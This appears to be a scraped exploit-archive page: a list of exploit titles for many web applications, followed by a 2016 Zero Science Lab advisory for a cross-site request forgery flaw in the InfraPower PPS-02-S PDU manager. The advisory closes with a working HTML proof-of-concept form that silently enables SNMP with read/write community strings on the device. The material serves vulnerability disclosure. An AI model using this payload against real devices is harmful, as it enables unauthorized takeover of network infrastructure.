3b565e4e9d
7 new exploits SetCMS 3.6.5 - (setcms.org) Remote Command Execution SetCMS 3.6.5 - Remote Command Execution PHP-Nuke < 8.0 - 'sid' SQL Injection PHP-Nuke 8.0 Final - 'sid' SQL Injection PHP-Nuke < 8.0 - 'sid' Parameter SQL Injection PHP-Nuke 8.0 Final - 'sid' Parameter SQL Injection Foojan Wms 1.0 - (index.php story) SQL Injection Foojan Wms 1.0 - 'story' Parameter SQL Injection Web Wiz Forums 9.07 - (sub) Directory Traversal Web Wiz Forums 9.07 - 'sub' Parameter Directory Traversal Web Wiz NewsPad 1.02 - (sub) Directory Traversal Siteman 1.1.9 - (cat) Remote File Disclosure Comodo AntiVirus 2.0 - ExecuteStr() Remote Command Execution SLAED CMS 2.5 Lite - (newlang) Local File Inclusion Liquid-Silver CMS 0.1 - (update) Local File Inclusion Web Wiz NewsPad 1.02 - 'sub' Parameter Directory Traversal Siteman 1.1.9 - 'cat' Parameter Remote File Disclosure Comodo AntiVirus 2.0 - 'ExecuteStr()' Remote Command Execution SLAED CMS 2.5 Lite - 'newlang' Parameter Local File Inclusion Liquid-Silver CMS 0.1 - 'update' Parameter Local File Inclusion Seagull 0.6.3 - 'optimizer.php' Remote File Disclosure ImageShack Toolbar 4.5.7 - FileUploader Class InsecureMethod (PoC) Seagull 0.6.3 - 'files' Parameter Remote File Disclosure ImageShack Toolbar 4.5.7 - 'FileUploader' Class InsecureMethod (PoC) flinx 1.3 - (category.php id) SQL Injection flinx 1.3 - 'id' Parameter SQL Injection Persits XUpload 3.0 - AddFile() Remote Buffer Overflow Persits XUpload 3.0 - 'AddFile()' Remote Buffer Overflow simple forum 3.2 - (File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities Simple Forum 3.2 - File Disclosure / Cross-Site Scripting WordPress Plugin WP-Cal 0.3 - editevent.php SQL Injection WordPress Plugin fGallery 2.4.1 - fimrss.php SQL Injection Oracle 10g R1 - pitrig_drop PLSQL Injection (get users hash) Oracle 10g R1 - PITRIG_TRUNCATE PLSQL Injection (get users hash) WordPress Plugin WP-Cal 0.3 - 'editevent.php' SQL Injection WordPress Plugin fGallery 2.4.1 - 'fimrss.php' SQL Injection Oracle 10g R1 - 'pitrig_drop' PLSQL Injection (get users hash) Oracle 10g R1 - 'PITRIG_TRUNCATE' PLSQL Injection (get users hash) phpMyClub 0.0.1 - (page_courante) Local File Inclusion bubbling library 1.32 - dispatcher.php Remote File Disclosure Bigware Shop 2.0 - pollid SQL Injection Smart Publisher 1.0.1 - (disp.php) Remote Code Execution SafeNet 'IPSecDrv.sys' 10.4.0.12 - Local kernel Ring0 SYSTEM Exploit phpMyClub 0.0.1 - 'page_courante' Parameter Local File Inclusion bubbling library 1.32 - 'uri' Parameter Remote File Disclosure Bigware Shop 2.0 - 'pollid' Parameter SQL Injection Smart Publisher 1.0.1 - 'filedata' Parameter Remote Code Execution SafeNet 10.4.0.12 - 'IPSecDrv.sys' Local kernel Ring0 SYSTEM Exploit phpCMS 1.2.2 - (parser.php) Remote File Disclosure Mambo Component NewsLetter - (listid) SQL Injection Mambo Component Fq - (listid) SQL Injection Mambo Component MaMML - (listid) SQL Injection phpCMS 1.2.2 - 'file' Parameter Remote File Disclosure Mambo 4.5 'com_newsletter' - 'listid' Parameter SQL Injection Mambo 'com_fq' - 'listid' Parameter SQL Injection Mambo 'com_mamml' - 'listid' Parameter SQL Injection phpCMS 1.1.7 - counter.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion phpCMS 1.1.7 - parser.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion phpCMS 1.1.7 - include/class.parser_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion phpCMS 1.1.7 - PHPCMS include/class.session_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion phpCMS 1.1.7 - include/class.edit_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion phpCMS 1.1.7 - include/class.http_indexer_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion phpCMS 1.1.7 - include/class.cache_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion phpCMS 1.1.7 - include/class.search_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion phpCMS 1.1.7 - include/class.lib_indexer_universal_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion phpCMS 1.1.7 - include/class.layout_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion phpCMS 1.1.7 - 'counter.php' Remote File Inclusion phpCMS 1.1.7 - 'parser.php' Remote File Inclusion phpCMS 1.1.7 - 'class.parser_PHPcms.php' Remote File Inclusion phpCMS 1.1.7 - 'class.session_PHPcms.php' Remote File Inclusion phpCMS 1.1.7 - 'class.edit_PHPcms.php' Remote File Inclusion phpCMS 1.1.7 - 'class.http_indexer_PHPcms.php' Remote File Inclusion phpCMS 1.1.7 - 'class.cache_PHPcms.php' Remote File Inclusion phpCMS 1.1.7 - 'class.search_PHPcms.php' Remote File Inclusion phpCMS 1.1.7 - 'class.lib_indexer_universal_PHPcms.php' Remote File Inclusion phpCMS 1.1.7 - 'class.layout_PHPcms.php' Remote File Inclusion phpCMS 2008 - 'ask/search_ajax.php' SQL Injection phpCMS 2008 - 'search_ajax.php' SQL Injection InfraPower PPS-02-S Q213V1 - Local File Disclosure InfraPower PPS-02-S Q213V1 - Insecure Direct Object Reference InfraPower PPS-02-S Q213V1 - Authentication Bypass InfraPower PPS-02-S Q213V1 - Multiple XSS InfraPower PPS-02-S Q213V1 - Cross-Site Request Forgery InfraPower PPS-02-S Q213V1 - Hard-Coded Credentials InfraPower PPS-02-S Q213V1 - Unauthenticated Remote Root Command Execution
53 lines
1.8 KiB
Text
Executable file
53 lines
1.8 KiB
Text
Executable file
InfraPower PPS-02-S Q213V1 Cross-Site Request Forgery
|
|
|
|
|
|
Vendor: Austin Hughes Electronics Ltd.
|
|
Product web page: http://www.austin-hughes.com
|
|
Affected version: Q213V1 (Firmware: V2395S)
|
|
|
|
Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
|
|
IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
|
|
Patented IP Dongle provides IP remote access to the PDUs by a true
|
|
network IP address chain. Only 1xIP dongle allows access to max. 16
|
|
PDUs in daisy chain - which is a highly efficient cient application
|
|
for saving not only the IP remote accessories cost, but also the true
|
|
IP addresses required on the PDU management.
|
|
|
|
Desc: The application interface allows users to perform certain actions
|
|
via HTTP requests without performing any validity checks to verify the
|
|
requests. This can be exploited to perform certain actions with admin
|
|
privileges if a logged-in user visits a malicious web site.
|
|
|
|
Tested on: Linux 2.6.28 (armv5tel)
|
|
lighttpd/1.4.30-devel-1321
|
|
PHP/5.3.9
|
|
SQLite/3.7.10
|
|
|
|
|
|
Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic
|
|
@zeroscience
|
|
|
|
|
|
Advisory ID: ZSL-2016-5375
|
|
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5375.php
|
|
|
|
|
|
27.09.2016
|
|
|
|
--
|
|
|
|
|
|
PoC:
|
|
|
|
<html>
|
|
<body>
|
|
<form action="http://192.168.0.17/SNMP.php?Menu=SMP" method="POST">
|
|
<input type="hidden" name="SNMPAgent" value="Enable" />
|
|
<input type="hidden" name="CommuintyString" value="public" />
|
|
<input type="hidden" name="CommuintyWrite" value="private" />
|
|
<input type="hidden" name="TrapsVersion" value="v2Trap" />
|
|
<input type="hidden" name="IP" value="192.168.0.254" />
|
|
<input type="submit" value="Submit request" />
|
|
</form>
|
|
</body>
|
|
</html>
|